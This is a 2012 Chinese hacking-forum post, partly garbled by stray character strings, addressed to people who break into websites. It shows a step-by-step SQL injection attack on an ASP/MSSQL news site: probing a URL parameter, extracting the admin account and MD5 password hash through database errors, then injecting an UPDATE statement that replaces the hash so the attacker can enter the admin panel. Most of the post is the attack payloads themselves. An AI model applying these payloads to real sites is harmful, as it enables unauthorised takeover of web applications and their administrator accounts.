经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
3 s9 V8 N( l$ i( K可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL): V. K; L& h" \9 @ U2 l
测试如下:
5 d3 W4 [' i1 l+ r2 Jhttp://www.tmdsb.com/news.asp?id=121" `. W/ e+ n( U9 ^' `% x
在地址后输入单引号,显示
" u' N4 ?, r. K, oMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’, V$ p4 @+ m* g8 k9 Y* X. L$ A x
字符串 ’’’ 之前有未闭合的引号" a+ r8 F) e! Z
/news/tmdws.asp,行63
/ o+ R! A% e" u: c2 H2 B5 x说明没有过滤单引号且数据库是MSSQL.
4 p+ W/ `; H/ n* ^and 1=1正常。and 1=2出错。肯定存在注入
/ E4 t8 G9 V/ n% l' q) A+ G接着输入! D; u3 a Q. h
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
' J2 s+ O7 p; d U3 ~) a得到帐号为:admin" @1 [9 W! @5 E) I$ z
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin) j) x8 D9 i/ B [8 t5 Y, y/ o% f
得到密码为:a4716077c2ba075c
) e* w4 J7 m2 Z5 r! {接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
Y2 I; T5 [" ]* X0 Y命令如下 :
) v- G$ o) }8 c" e! q;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–0 F/ T. Y+ ?. S% ]
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41